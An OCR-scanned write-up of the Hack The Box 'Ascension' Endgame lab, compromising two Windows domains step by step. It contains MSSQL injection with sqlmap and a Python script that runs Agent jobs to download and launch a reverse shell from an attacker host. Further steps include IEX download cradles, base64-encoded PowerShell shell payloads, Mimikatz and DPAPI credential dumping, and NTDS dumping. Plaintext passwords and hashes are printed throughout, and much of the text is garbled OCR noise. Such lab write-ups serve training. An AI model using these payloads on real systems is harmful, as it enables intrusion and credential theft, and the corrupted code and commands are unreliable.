ASCENSION re Petty MEDIUM eet Hostname WEBO1 daedalus.local DC1.daedalus.local Ms01.megaairline.local DC2.megaairline.local Entry point: WEB01 daedalus.local (IP 10.13.38,20), 1. Takeoff Scan the environment: LL pplication Atta oer eed ARE YOU READY? DISCOVER ) ASCENSION P 192.168.10.39 192.168.10.6 192.168.11.210 192.168.11.201$ sudo nmap -n -Pn --min-rat 1000 -T4 10.13.38.20 -p- -v | tee ports $ ports="cat ports | grep ‘A[0-9]' | awk -F "/" '{print $1}" | tr “\n" '," | sed 's/,S//" $ sudo nmap -n ~Pn SVC -oA nmap/10-13.38.20-al1tcp.nmap 10.13.38.20 -p$ports Port STATE SERVICE VERSION 80/tcp open http Microsoft IIs httpd 10.0 | hetp-methods: |_ Potentially risky methods: TRACE |-http-server-header: Microsoft-11S/10.0 |-hetp-title: paedalus Airlines 135/tcp open msrpc Microsoft windows RPC 139/tep open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds windows Server 2019 standard 17763 microsoft-ds 1433/tep open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM | ms-sql-ntIm-info: | Target_Name: DAEDALUS | Netex0s_pomain_Name: DAEDALUS | Netexos_computer_Name: WEBO1 | ONS_Domain_Nane: daedalus. local | DNS_computer_Name: WE801.daedalus. local | DNS_Tree_Name: daedalus.Jocal |. Product_version: 10.0.17763 | ssl-cert: subject: conmonName=sst_self_signed_Fallback | Not valid before: 2020-12-30T06:50:12 |.Not valid after: 2050-12-30106:50:12 |-ssl-date: 2020-12-31123:19:40+00:00; +1h20m59s from scanner time 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntIm-info: | Target_Name: DAEDALUS | Netez0s_pomain_Name: DAEDALUS | Netez0s_computer_Name: WEBO1 | DNS_Domain_Nane: daedalus.1ocal | DNS_computer_Name: WEB01. daedalus.Jocal | DNS_tree_Name: daedalus. local | Product_version: 10.0.17763 |_ system time: 2020-12-31723:19:30+00:00 | ssl-cert: Subject: conmonName=WE801.daedalus.ocal | Not valid before: 2020-10-09T18:14:30 |.Not valid after: 2021-04-10718:14:30 |-ss1-date: 2020-12-31723:19:40+00:00; +1h20m59s from scanner time 5357/tep open http Microsoft HTTPAPI httpd 2.0 (ssDP/uPnP) |-hetp-server-header: microsoft-HTTPAPI/2.0 |-http-title: service Unavailable 5985/tep open http Microsoft HTTPAPI httpd 2.0 (ssDP/uPnP) |-hetp-server-header: Microsoft-HTTPAPI/2.0 |_hetp-title: Not Found 47001/tcp open http Microsoft HTTPAPT httpd 2.0 (ssDP/uPnP) |_http-server-header: microsoft-HTTPAPI/2.0 |_hetp-title: Not Found 49664/tcp open msrpc Microsoft windows Rec 49665/tcp open msrpc Microsoft windows RPC 49666/tcp open msrpc Microsoft windows RPC 49667/tcp open msrpc Microsoft windows Rec 49668/tcp open msrpc Microsoft windows Rec 49669/tcp open msrpc Microsoft windows RPC 49670/tcp open msrpc Microsoft windows RPC 64662/tcp open msrpc Microsoft windows RecService Info: oss: Windows, Windows Server 2008 R2 - 2012; CPE cpe:/o:microsoft:windows Host script results |_clock-skew: mean: 2h29n33s, deviation: 3h01m26s, median: 1h20nS8s | ms-sql~info: | 10.13.38.20:1433 version: name: Microsoft SQL Server 2017 RTM+ number: 14.00.2027.00 Product: Microsoft SQL Server 2017 Service pack level: RTM Post-sP patches applied: true TeP port: 1433 ‘smb-os-discovery: 05: windows Server 2019 standard 17763 (Windows Server 2019 standard 6.3) Computer name: WEBO1 NetBIOS computer name: WEB01\x00 Domain name: daedalus. local H H H Il H i I. i H H H Il | Forest name: daedalus. local | FQON: WEBO1.daedalus. local |. System time: 2020-12-31715:19:33-08:00 | smb-security-mode: | account_used: | authentication_level: user | challenge_response: supported |. message_signing: disabled (dangerous, but default) | smb2-security-mode | 2.02 |. Message signing enabled but not required | smb2-time | dave: 2020-12-31723:19:32 JL start_date: N/a Discover SQL in http: //10.13.38.20/book-trip. php Coe Save the request to book-trip.req and enumerate DBs with sqlmap:$ sqlmap -r book-trip.req -p destination --dbms mssql --batch http: //127.0.0.1:8080 --fresh-queries dbs --proxy List all the database users: $ sqimap -r book-trip.req -p destination --dbms mssql --batch ~-users Drop into the SQL shell and get the MS SQL Server version, current database name and current user name: sql-shell> @@version sql-shel1> db_nane( sql-shell> current_userEnum DB Roles Here we're looking at what roles database users are assigned. Create roles table for the output (sqlmap sometimes doesn't do it correctly when feeding it complex queries directly for blind SQLis) CREATE TABLE roles ([username] sysname, [rolename] sysname) destinations"; CREATE TABLE roles ([rolename] sysname, [username] sysname)-- xyzhadults-&chiTdren= Map database user names to database role names (query stolen from docs.microsoft.com): SELECT isnul1 (DPL.name, 'No menbers') AS DatabaseUserName, DP2.name AS patabaseRolenane FROM msdb.sys-database_role_members AS ORM LEFT OUTER JOIN msdb.sys-database_principals AS DP1 ON DRM.menber_principal_id = DP1.principal_id RIGHT OUTER JOIN msdb, sys.database_principals AS DP2 ON DRM.role_principal_id = 0P2.principal_id WHERE 0P2.type = 'R* ORDER BY DPI.name destinatio "No menbers') AS DatabaseUserName, DP2.name AS DatabaseRoleName FROM msdb. sys database_role_members AS DRM LEFT OUTER JOIN INSERT INTO roles (username, rolename) SELECT isnull (oPl.name, msdb. sys database_principals AS DP1 ON DRM.menber_principal_id = pPL.principal_id RIGHT OUTER JOIN msdb.sys.database_principals AS DP2 ON ORN.role_principal_id DP2.principal_id WHERE DP2.type = 'R' ORDER BY DPl.name-- xyz&adults=&chi ldrer Dump the resulting table: $ sqlmap -r book-trip.req -p destination --dbns mssql --batch -p daedalus -T roles --dump --proxy http://127.0.0.1:8080 --fresh-queriesELE ry Lec [39 entries] es ons Seas eeuaaes Cements Suerte) Pome red td estes ano Pe Cac ea poten ne 4 eee Saree ne Pee estat Cone er Gy Cimereiectrrss db_ssisltduser Ces e seteog Ces er Isclog cere ected Cee ecid ee once | No menbers oor ce) moored ons ot tetcabeasssatess rtrd erro Pow elena tacss Crag emo oes Pobre Tied ets OP cri Tot irip eer iors POM eger ec ecerstr cy Poaiccn Un urees sc BSL ServerGroupReaderRole | ServerGroupAdministratorRole iauetsge occ oes UtilityIMRWriter uo skees pu cu rtd | UtilityIuewriter Cece | dbo eee) ioe Conese) one isey Comey | Ce rad | Cerca i} Crile cod | COO esd | CO rte stasg | ch cc ct eae Wo rey Pet No ey Dee The daedalus_admin user has saLagentUserrole, saLagentReaderrole and ‘SQLAgentoperatorkole roles assigned, which means he can create and run SQL Server Agent jobs even if he is not a sysadmin IF we could impersonate daedalus_adiin, then we would be able to create and run jobs too. Enum DB Grants Now we're looking for principals that current database user (daedallus ) is allowed to impersonate.Create grants table for the output CREATE TABLE grants (username varchar(1024)) destinatio CREATE TABLE grants (username varchar(1024))-~ xyzéadul ts=&chiTdren= Discover principals that can be impersonated by daedalus (query stolen from NetSP!) SELECT distinct b.nane FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b-principal_id WHERE a.permission_name = 'IMPERSONATE" destination='; INSERT INTO grants (username) SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b-principal_id WHERE a.permission_name = ‘IMPERSONATE! —— xyzhadul tse&chi Idren Dump the resulting table: $ sqimap -r book-trip.req -p destination --dbms mssql --batch -p daedalus -1 grants --dump --proxy http: //127.0.0.1:8080 --fresh-queries Voila! As one would expect, we can impersonate daedalus_admin using EXECUTE AS, Enum Proxy Accounts ‘A SQL Server Agent proxy account defines a security c: intext in which job step ‘0 set permissions for a particular job step, Each proxy corresponds to a security credenti a proxy that has the equired permi jons for a SQL Server Agent subsystem, anc lat proxy to the job ep." - docs.microsoft.com Create proxy table for the output (result sets taken from here!CREATE TABLE proxy ([proxy_id] int, [name] sysname, [credential_identity] sysname, [enabled] tinyint, [description] nvarchar(1024), [user_sid] varbinary(85), [credential_id] int, [credential dentity_exists] int) destinatio CREATE TABLE proxy ([proxy_id] int, [name] sysname, [eredential_identity] sysname, [enabled] tinyint, [description] nvarchar (1024) , [user_sid] varbinary(85), [credential_id] int, [credential_identity_exists] int)- ~ xyzdadul ts=&children= Impersonate daedalus_admin and enumerate SQL Server Agent proxies EXEC AS Togin N'daedalus_admin'; INSERT INTO proxy EXEC msdb.dbo.sp_help_proxy destinatio 3 EXEC AS login = N'daedalus_admin'; INSERT INTO proxy EXEC msdb.dbo.sp_help_proxy-~ xyz&adults=&chi ldren: Dump the resulting table: $ sqimap -r book-trip.req -p destination -dbns mssql --batch -p daedalus -T proxy ~-dump proxy http://127.0.0.1:8080 --fresh-queries We've discovered an existent proxy, so we can now execute the full attack to gain RCE, MSSQL Agent Jobs for Command Execution will follow Optiv to gain RCE via Agent jobs, The only thing that | have to add is the, @proxy_id parameter (for the sp_adé_jobstep procedure) which will point to the discovered proxy account. PoC script on Python to get ping back: #1/usr/bin/env python} port sysfrom random import choices from string import ascii_lowercase import requests Thost = sys.argv[1] rnd = '*.join(choices(ascii_lowercase sqli_rce USE msdb;\ EXEC AS login = N'daedalus_admin';\, EXEC msdb.dbo.sp_add_job @job_name = N'*%s_job';\, EXEC msdb.dbo.sp_add_jobstep @job_name = N'%s_job’, @step_name = N'Xs_step’, Gsubsystem = N'cndexec', @conmand = N'c:\\windows\\system32\\end.exe /c ping -n 1 Xs", Gretry_attempts=1, @retry_interval=5, @proxy_ide1;\ EXEC msdb.dbo.sp_add_jobserver @job_name = N'Xs_job’ EXEC msdb.dbo.sp_start_job @job_name = N's_job";\ % (rnd, rnd, rnd, Thost, rnd, rnd) sqli_template Ks- xyz" data = {‘destination': sqli_template % sqli_rce, ‘adults’: '', ‘children’ proxies = {‘http': ‘http: //127.0.0.1:8080", ‘https’: ‘http: //127-0.0.1:8080"} resp = requests post(*http: //10-13.38.20/book-trip.php’, data-data, proxies-proxies) Weaponized script to deliver this reverse shell by @xct and execute it: #!/ust/bin/env python3 from sys import argv from random import choices from string import ascii_lowercase import requests class Agent3obshel1: def _init_(self, subsystem, Thost, port): self._subsystem = subsystem self,_Thost = Thost self._Iport = Iport# upload shell if self._subsystem == 'Powershel1": self._command = '''powershell -NoP -sta -Nont -w Hidden -Exec Bypass -C “(New-object Net .WebCl ient) .DownloadFile(' ‘http: //Ks:%s/xc.exe'', **Senv:userprofile\\music\\snowverash.exe'')"'"* % (self._Thost, se1f.—Iport) # exec shell elif self._subsystem == ‘cmdexec' self._command ‘c:\\windows\\systen32\\cmd.exe /c KUSERPROFILEXX\\music\\snowcrash.exe %s %s''' % (self._Thost, seTf._Iport) def exec_agent_job(self): rnd = ''.join(choices(ascii_lowercase, k=8)) sqli_ree = """\ USE msdb;\ EXEC AS Togin = N'daedalus_admin';\ EXEC msdb.dbo. sp_add_job @job_name = N'Xs_job";\, EXEC msdb. dbo. sp_add_jobstep @job_name = N'%s_job', @step_name = N'Ns_step', @subsystem = N'Xs", @command = N'Xs', @Qretry_attempts-1, Gretry_interval=5, @proxy_id=1;\, EXEC msdb.dbo.sp_add_jobserver @job_name = N'%s_job";\ EXEC msdb.dbo.sp_start_job @job_nane = N'%s_job’;\ replace('\t', '') % (end, rnd, rnd, self.subsystem, self. command, rnd, rnd) sqli_template = ""; %s-- xyz" sqli_template % sqli_rce, ‘adults’: '', data = {'destination ‘children’: '} proxies = {‘http': 'http://127.0.0.1:8080", "https “http: //127.0.0.1:8080"} resp = requests. post('http://10.13.38.20/book-trip. php proxies-proxies) datasdata, if name == '_main': subsystem = argv[1] Thost = argv[2] port = argv[3] S = AgentJobshel1 (subsystem, Thost, Iport) s.exec_agent_job()Now we can grab the first flag and move on.LastwriteTime 1/21/202 BUVBT YELL) UYEU IPAs) 10/19/2020 1/21/2020 2/29/2020 OIE) 10/14/2020 10/8/2020 RTA aa) Roca ences) Dye tae sa ERENCES TR ae (ao LastWriteTime 10/14/2020 10:38 AM (Sea Os 'Flag 1 ASCENSTON{yOur_MtAtvanauesanennsy Refs 2. Intercept fens Administrator perp Uber a U0 ugeu reg esas) iets Reale QLTELEMETRY Eve) ory Length NameAfter getting the initial shell on WEBOT, | will run Inveigh to see what name resolution requests are flying around in the network: PS > IEX(New-object. Net .webClient) .Downloadstring("http: //10.14.14.37/inveigh.psi") PS > Invoke-Inveigh -IP 192.168.10.39 -consoleoutput N -Fileoutput Y -NENS Y - MONS Y -Proxy ¥ -Machineaccounts ¥ -HTTP N Someone on the local box is repeatedly trying to resolve non-existent FINOL name. It gives me an idea that a scheduled task may be possibly involved to simulate this activity. will attempt to run Seatbelt to list scheduled tasks, but it fails due to insufficient privileges. That's why | decide to get a meterpreter shell, migrate to another process and try again.Iwill use. to launch Seatbelt from memory (Defender is active), and this time | am lucky to get some domain creds: PS > IEX(New-object, Net .webclient) .Downloadstring ‘nttp://10.14.14.4/inveigh. ps1" PS > Invoke-Seatbelt -Conmand Scheduledrasks feterareter > lead ponershell See eee aa Fanart! Foire Seema a Reece? ro) en Se TKR CCG prpnnNallaenin Tne Teer E.G cern een Z Pence ctr) F ogomtype © OFF TOP. This method of bypassing AV signature analysis is really cool, Btw. You can Gzip-compress and Base64-encode a .NET assembly to load it reflectively via PowerShell right from memory! This blog post covers the topic in depth, while | can use this simple script to prepare an executable to be injected into PowerShell code:function Invoke-Conpressencodeassenbly t Sbytes = [systen.10, File] ::ReadAl1Bytes("\path\to\binary.exe") [system.10.Menorystrean] Soutput = Nen-object System.I0.Menorystrean Sozipstrean = New-object system.r0.conpression.czipstream(Soutput, [system. 10.conpression.compressionsode] : :conpress) Sgzipstrean.write(Sbytes, 0, Sbytes.Length) Sozipstrean.closeQ Soutput.closec byte] Sbyteoutarray = Soutput.TearrayO Sencodedzipped = [system.convert] : :Tobase64string(Sbyteoutarray) Sencodedzipped User DAEDALUS\bi11ing_user is a local admin on WEBO1, so I can set SOCKS tunnel with Chisel, WinRM into the box and capture the second flag $ ./chisel server reverse -p 8000 meterpreter > execute -cH -F “cmd /c c:\users\svc_dev\music\chisel.exe client 10.14.14.4:8000 R: sacks’ $ proxychains4 -q cme smb 192.168.10.39 ~ *p43d41use1111nge0ss’ $ proxychains4 -q evil-winrm -u billinguser ~p D43d4lusB1111nge0ss ~ 192.168.10.39 -s “pwd’ -e “pnd” *biling_user’ ~ IFlag 2. ~ ASCENSTON{NO_cOnmnand_*#*####} 'Bonus When running Seatbelt with -group=a11 , | noticed another set of privileged credentials for MSSQL. It was extracted as a result of the credenum module execution: PS > Invoke-Seatbelt -command Credenumcama Cred Pericere temmmmeen arity aeenemamnieh iceman (emer el ern enn ee cer Now I can configure reverse port forwarding on eth2 interface (that’s my ) and log into MSSQL using SQL Server Management Studio on my Windows host: meterpreter > execute -c -f “cmd /c c:\users\svc_dev\music\chisel.exe client 10.14.14,4:8000 R:192.168.56,110:1433:127,0.0,1:1433"oH Cocauncnne c cepeepom x SQL Server ‘Tun copsepe: [Rape CED. Y Vos cepeepa! fis2.168.56.110 ~ Tposepte nomnimnoct Tpoeepranonnrmnacin SQL Server Y Vora an exon se v Mepons. eee C1 anon napons [Geen] [eee] [eee] ee Sarees ————— Saaxne eens — cae Ome - | a isan SS = 2 Eicon = Boewreca | also tried to get a shell as NT SERVICE\mssqlserver and then escalate to admin by abusing SeInpersonatePrivilege with RoguePotato, but this attempt failed. 3-4. Contrails, Wingman After obtaining admin privileges on WEBO", | will collect LSA secrets and get DAEDALUS\svc_backup user creds right off the bat from Credential Manager Mimikatz collector (crednan section): meterpreter > kiwi_end '"sekurlsa::logonPasswords full” “exit”*Menge se Me Seen Sec ae Trusts te Che cee (esata Peet) ema Reet) SID Cae TTS Sore Pe NTLM ace Pa rer Pree Peed rt Sess Pa aa Paar Sarre] Sees ae oe ec TT} Pater Sarr Pao) eC ae) RenoteInteractive fron 2 PyiaeU ead yay tate) pci SALI eel Pa PSS mr Eee a ot ESS Bey 11) A EES RRL SU} Le eU lag Pune Crag Day Peete toe Stee et te ed 8bee75965452b75aebd833e2b6061b5a9323535& Per tae rade Sear UALR euleU racy Day (cma) Sueur mc reece toerTm (cma) PCy RI svesbackul Bays RI\ svc backtl Tuer LC As we will see later, that’s not the intended way to get these credentials. Iwill use SharpDPAP| to discover deeplier hidden Data Protection secrets. | start from a meterpreter shell as DAEDALUS\bi11ing_user within a Medium Mandatory Level process (UAC is enabled). It lets me pwn DAEDALUS\svc_backup in the intended way: cnd > .\sharpopapr.exe credentials /password:43d41use1111ngs055Then | will switch over to a High Mandatory Level meterpreter shell (still as DAEDALUS\bi11ing_user ) and enumerate master keys supplying a dummy password. Note, that only Administrator. DaeDALus (domain admin) and biT1ing_user master keys are successfully triaged: cnd > .\sharpopapr.exe masterkeys /password: PasswOrd! Now |will attempt to decrypt all users’ DPAPI credentials with DPAPI_SYSTEM secret: cnd > .\sharpopapr.exe machinecredentials\Wsers\billing_user\music>. sharpdpapi machinecredentials Romer a oruesr sey rere] (ICs th SU garcia ee acer ig to SYSTEM via token dupli Boar REN foe eel cee gence Use preg aia tet eres ad fee eee ee melts tets ic etait eg a (ea enc omens (Cece ere ere eee Eicon eece ec eet [eerie iene mare brio ts [rer eer em IeTt sets Oceue rer eaeL es (EoetO acces rer eee teres Pegs Uer cent ep PeeEESter gy Cuceererrotn irra ttan (ere errr meer nae (eneteeIr ees [erecteM mir errmeticit tit (Eee eros [=] Teiaging Systen Credentials ocd Beet ote credFile Prac ier Bea Peetcts Corerentrars ey peeimec ssn! eee cect certs cone’ re Credential SEOUL} Beret cad cet cy Corin Pu otstrtore ty Pee cen Se ssTas Poses ec Peres fy eee Pe Ce peeimerer sty ec) coe certs comment rene ooeirst SURO BUEty Peer crette er Cesare ripe) forint Pec na Ce ertedl Panny PCs as Ea ene CeCe east tage errrserane errs eceuresrt reece sts) gee Par ery apenas ECE eee etac te terstast Ce eee eases eran a aera poeta ye rere rere) grep etre 1 rue Serene ta cuts rey Sag ea Urs ears ee at aeceroe ete) Cetera mere eects 32 EDFEDB273EDB19A10C2124DAS678CBBBECEF72 SA et ease Eee Caen eed EEL E rea iss see Sere LSESt Ly] Oe Naam) ae 512) / 26128 (CALG_AES_256) Pac} oa Peer a Ce Ue ey See eae} SEL LeTtt Ly) sem) 512) / 26128 (CALG_AES_256) cao coer Peers ro ey Cesta c ese Se ees CLS oe)scription eetmese isha) eee Z a cee RUC Stan eee easy TargetAlia ment rend edential As you can see, some additional creds are extracted, including the password of the builtin DAEDALUS domain admin. | don't know if it was intended by Endgame creators (doubt it), but at this point | can log into DC1 and grab both the third and the fourth flags: $ proxychains4 -q cme smb 192.168.10.6 ‘pleasefastenyourseatbelts01!' $ proxychains4 -q evil-winrm -u ‘administrator’ -p ‘pleasefastenyourseatbeltsOL!" =i 192.168.10.6 -s “pwd” -e pwd” ‘administrator’ ~ 4. Wingman. The Intended Way After obtaining DAEDALUS\svc_backup credentials and examining his domain rights (canPsRenote to DC1) lam supposed to WinRM into the box and search for some juicy stuff. The Invoke-8inary cmdlet from evil-winrm did not work for me for some reason, so | had to upload. winPEAS.exe manually and run it from disk $ proxychains4 -q evil-winrm -i 192-168.10.6 -u ‘svc_backup" -p "]kOXANHK|#7W#XSS* -s “pwd” -e “pnd *EviT-winkm® PS C:\Users\svc_backup-DAEDALUS\music> upload winpeas.exe *Evil-winRM® PS C:\Users\svc_backup-DAEDALUS\music> .\winpeas.exe log “EviT-winkM® PS C:\Users\svc_backup-DAEDALUS\music> download out-txtDC1 appears to have some extra drives mounted, one of which is labeled as "Backups". If| switch to this drive, | will see local admin pa So now | can dump NTDS with impac ket's secretsdump.py - daedalus.local is pwned: $ proxychains4 -q cme smb 192,168.10. “local -auth -u administrator -p ‘kr4dfi $ proxychains4 -q secretsdump.py administrator: "kr4df76Fi*)fACE73,SE sar mney ehaeerrne oe eae prey 3 ~ ASCENSTON{15nT_dpapLseeesse} memory was not the intended way 4. ~ ASCENSTON{OG_####82eKHRHHH) DPAPI is mentioned, so messing with LSASS !Bonus When running kiwi's 1sa_dunp_secrets | noticed that WE801\svc_dev password appeared in context of the SQLSERVERAGENT service.Pesterpreter > 1s ce Pace st Bete rete? Pe Ree eee recurred daedalus. local ——— Roser ee ey co seer mete Tiersen ee tnirteote? eee eee See ea: Seer re Pi eee she ere ree siaai7? esrerrtertereeteteer ty sere Sore rer or eee eee one) Ee Cri ae a ere RC ae errr a Beers ee ern eee creer eee eae eerrerri rae eee rts ee Pret Peres retrace eaten rr eter vear rrr seers Tee Pere ererre ro reerrestrar Tstrcter teen Paco ronrewrercr reser err errr ioe ier eres a Seer eee sere Menomena Teenie sone oeTsenriT ee Poseetteeeristoerretitiesscoiraett rier ean Serres Exe es It makes sense because here kiwi is showing us those proxy account credentials that are saved in MSSQL Server. If Irun SharpDPAPI with this password, | can decrypt sve_dev DPAPI credential blob and obtain sa secret once again: cnd > .\sharpoparr.exe credentials /password: a2W@rwazG+zare4 re crearite erg terteea eet po See eee a 5 Sao 32782 (CALG_SWA_512) / 26128 (CALG_AES_256) rena} eer ees Tee ee cere 5. Corridor Possessing domain admin's password in plaintext, | will make my life easier and connect to DC1 via RDP for further enumeration:$ proxychains4 -q xfreerdp /u:'adninistrator' /p:'pleasefastenyourseatbelts01!' /v:192.168-10.6 /dynamic-resolution +clipboard /drive: share, /hone/snowvcrash/htb/endgames/ascension/waw Ifthe Endgame description is to be believed, there is another domain somewhere to be attacked, so the first thing | will do is enumerate the network.BH Administrator: Commend Prompt SSCS rere cat aertysty nnection-specific DNS Suffix Link- vee DC1 is a dual-homed machine with 192.168.11,6 as the second IP address. There are also tw yet unknown machines in ARP cache: 192.168.11.201 and 192.168.211.210. | can navigate to my local SMB drive and import Power'View to enumerate domain trusts: nd > powershel] -exec bypass Ps > cd "\\tsclient\share" PS >. .\powerview4.pst PS > Invoke-MapDonaintrust[BB Administrator: Command Prompt - powershell eaeCr erst pee ee ag The second domain - megaairline.local — is in FOREST_TRANSITIVE trust with daedalus./ocal (cross- forest trust between the root of two domain forests, ref). According to the machine names on Hack The Box board | will assume that 192.168.211.201 and 192.168.11.210 are DC2.megaairline.local and MSO1.megaairline.local (not ne essarily in that order). It can be verified with nslookup Iwill use Portscan.pst to enumerate o| ports on these machines: PS > . .\invoke-portscan.psi. PS > Invoke-Portscan -Hosts 192.168.11.201,192.168.11.210 -TopPorts 1000 -T 4 oA de2-ms01-1000 PS > cat de2-ms01-1000.gnmap | findstr open| will target the web service at 80/TCP, 443/TCP on MSO1 and search for low hanging fruits (80/TCP 's open actually, itjust errors out). To enumerate HTTP(S) applications | will use and discover some interesting endpoints: PS > .\gobuster.exe dir -ku "https://ms01.megaairline.local' -w directory-list- Jowercase-2.3-big.txt -x aspx -a 'Mozilla/5.0 (Windows NT 10.0; winéé; x64; rv:74.0) Gecko/20100101 Firefox/74.0" -s 200,204,301,302,307,401 -b 400,404 There's a running on MSO1 and it waits for authentication. see x inyeotig, | will assume that some user from daedalus.local also belongs to megaairline.local, so | will grab the last NT hash from NTDS that we yet don't have a plaintext value for (DAEDALUS\elliot) and go toNice, now I can verify itwith a simple net use command against megaairline.local: PS > net use \\de2.megaairline. local\NETLOGON *84@m!n@s* uuser:megaairl ine. local\e11iot PS > net use \\de2.megaairTine. local \NETLOGON /delete Te ines Commando =o x The elliot user creds are valid in megaairline.local, cool! By the way, | could verify the NT hash directly without the plaintext value - with SharpMapExec, for example: PS > Invoke-SharpMapexec -conmand "ntIm smb /user:eTliot /ntlm:74fdf381a94e1e446aaedf1757419ded /domain:megaairTine. local /conputername:dc2 /m:shares" now | will log into Secret Server and go straight to /secretserver/Adminscripts .aspx=== | Dn a ee eee | Honestly, | spent quite some time enumerating the web application and searching for known public CVEs - there aren't that many of them. And | was very surprised that there is a command nection in the Params field when you edit (SSH) scripts. epoca reared eth pt . caauny [Depenngy + Seer Pans we shey feo whDeanne neae Not sure why itis still not assigned a CVE ID... May be I's up coming @) Anyways, if| provide something like foo || type :\users\el Hot\desktop\flag.txt || bar as a payload, | will get the fifth flag. Now let's get a proper shell on the box. 'Flag ASCENSTONGaOt_so_s3ch3t_*******) 6. Upgrade Before actually messing with getting the reverse shell | will frst disable Windows Firewall via GPO (both the domain and standard profiles)DCI machine, being a Windows Server with a Active Directory Domain Service role, keeps reactivating the firewall, so creating a new GPO is am important step in obtaining a stable shell (a pretty guide on how to disable the Windows Firewall in any way you want -* here), Now, there're 2 possible users to get the shell as: MEGAAIRLINE\e11iot and IIs APPPOOL \defaul tapppool To get the shell as the fst user | will upload xc. exe binary via the CMDi and run it in the background (to serve files | installed Python 2 with the official MSI installer and used the native SimpleHTTPSever module}; foo || powershel1 -exec bypass -enc JABJAGWAAQBTAG4AdAAQADOAIABOAGUAGMATAEBAYGEqAGUAYWBOACAAUWBSAHMAGABTAGOALGBOAGUA dAAUAFMAbWB AGSAZQBOAHMAL GBUAEMAUABDAGWAaQE 1AG4AdAAOACCAMQASADTAL GAXADYAOAAUADEA MQAUADYA2WASADKAMAAWADEAKQA7ACQACHBOAHIAZQBhAGOATAAACAAJABJAGNAAQETAG4AGAAUAECA ZQBOAFMAABYAGUAYOBtACGAKA7AFSAYGBSAHQAZQBDAFOAXQAKAGIACQBOAGUACWAGADOATAAWACAA LLGAZADUANQAZADUAFAA AHSAMABSADSAduBOAGKADAB TACGAKAAKAGKATAAGACAAJABZAHQACGBTAGEA bqAUAFTAZQBhAGQAKAAKAGTACQBOAGUACHASACAAMAASACAATAB/ AHKAABTAHMAL gBMAGUADgBNAHQA AAAPACKATAAtAG4AZQAGADAAKQB7ADSAJABKAGEAABHACAAPQAGACGATQBIAHCALQBPAGIAaGBIAGHA dAAGACOAVABSANAAZQBOAGEAQS TACAAUWBSAHMAGAB TAGOALgBUAGUA@ABOAC4AQQBTAEMASQBJAEUA bgBJAGEAZABpAG4AZWAPAC4ARWS TAHQAUNBOAHTAAQBUAGCAKAAKAGIAEQBOAGUACWASADAALAAGACOA AQAPADSAIABZAGUABGEKAGIAYQ2:j AGSATAA9ACAAKABPAGUAGAAGACQAZABhAHQAYQAGADIAPGAMADEA TABBACAATWBLAHQAL QBTAHQACGBPAG4AZHAGACKAQWAKAHMAZQBUAGQAYGBhAGMAaWAYACAAPQAGACOA ‘cB 1AG4AZABiAGEAYwIB FACAAKMAGACCATMAGACCAOWAKAHMAZQBUAGOAYGBSANQAZQAGADOATAAOAFSA dABTAHgAdAAUAGUAbgBjAGSAZABPAG4AZWBGADOAOGBBAFMAQWEIAEKAKQAUAECAZQBOAETACQBOAGUA (CWADACQACHBTAG4AZABiAGEAYW8rADTAKQA7ACQACWBOAHTAZQBHAGOAL GBXAHTAaQBOAGUAKAAKAHMA ‘ZQBUAGQAYGBSAHQAZQASADAAL AAKAHMAZQBUAGQAY GB SAHQAZQAUAEWAZQEUAGCAUABOACKAOWAKAHVA dABYAGUAYQBtAC4ARGE SAHUACMBOACGAKQBADSAJABjAGHAAQETAG4AdAAUAEMAbABVAHMAZQAOACKA cga= || bar PS > IWR -Uri "http: //192.168.11.6:8080/cnd.aspx" -outrile c:\inetpub\mwwroot\snovverash.aspx" PS > IWR -Uri “http: //192.168.11.6:8080/xc.exe" -outFile "c:\users\eliot\music\xc. exe”To get the shell as the 2nd user | will upload an ASPX web shell and then proceed to uploading xe.exe again from it: Scat a Ime -uri "http://192.168.11.6:8080/xc.exe” -outFile “c:\windows\system32\spool\drivers\color\xc-exe” $ echo "powershell -enc ' “cat a | iconv -t UTF-16LE | base64 -n0 Powershell -enc ‘SQEXAFIATAATAFUACGEDACAATgBOAHQAdABWADOALWAVADEAQQAYAC4AMQAZADGALGAXADEALGAZADOA ‘OAAWADGAMAAVAHGAYWAUAGUAGABTACIATAAtAESAdQROAEYAaQBSAGUATAAAGNAOGBCAFCAAQEUAGQA bw83AHMAXABTANKACWBOAGUABQAZADIAXABZAHAADWEVAGHAXABKAHIAAQB2AGUACGBZAFWAYWBVAGKA bweyAFWAeAsjAC4AZQB4AGUATGAKAAS= S cata Start-Process -NoNewwindow c:\windows\systen32\spool\drivers\color\xc. exe "192.168.11,6 9004" $ echo ‘powershell enc powershell -enc UB OAGEACGEOACOAUABYAGBAYW8 TAHMACHAGACOATGBVAE4AZQB3AFCAAQBUAGQADNE 3ACAAYWAGAFWA \VWBPAG4AZABVAHCACWECAFMAQBZANQAZQBtADMAMGECAHMACABVAGBADABCAGQACGEPAHYAZQBYAHVA XAB J AGBADABVAHTAXAB4AGMAL gB 1 AHGAZQAGACIAMOASADIAL GAXADYAOAAUADEAMQAUADYATAASADAA MAROACTACQA= "eat a | iconv ~t UTF-16LE | base64 -n0)A Spoiler. Shell as iS APPPOOL\defaultapppoo! wil make no use for us here. SeInpersonatePrivi lege is not exploitable on this server afaik, since the only available machine on the network is DCI which is not a helper for RoguePotato, see this blogpost. Unfortunately, the first shell as MEGAAIRLINE\elliot was dying every time the web request timed out, so | had to use forward local SSH service on MS01 and connect to it as elliot: [xc ¢:\windows\systen32\inetsrv]: !1fwd 2222 127.0.0.1 22 cnd > ssh megaairline\[email protected] -p 2222 Looking around on the box, we will see that there's another elliot user - in local administrators installer which is a hint for the next flag, group this time. Also there's this SlaPottaa ne Leary After running winPEAS and a bit of googling | found out that Slack leaves sensitive artifacts in KLOCALAPPDATAK Chrome’s DB + APPDATA OH MY... OH NO! | will pull it from the remote via SCP (Windows OpenSSH SCP Syntax is awesome when dealing with spaces is path, btw) cmd > sep -P 2222 megaairline, 1ocaT\[email protected]:"\"\"C:\Users\e11iot\appoata\Local\Google\chr one\User Data\befault\indexedoa\https_app..s lack. com_0. indexeddb.blob\1\00\7\"\ slack. blob will do strings the blob on Kali and get another password.( Tee Gl i [ex 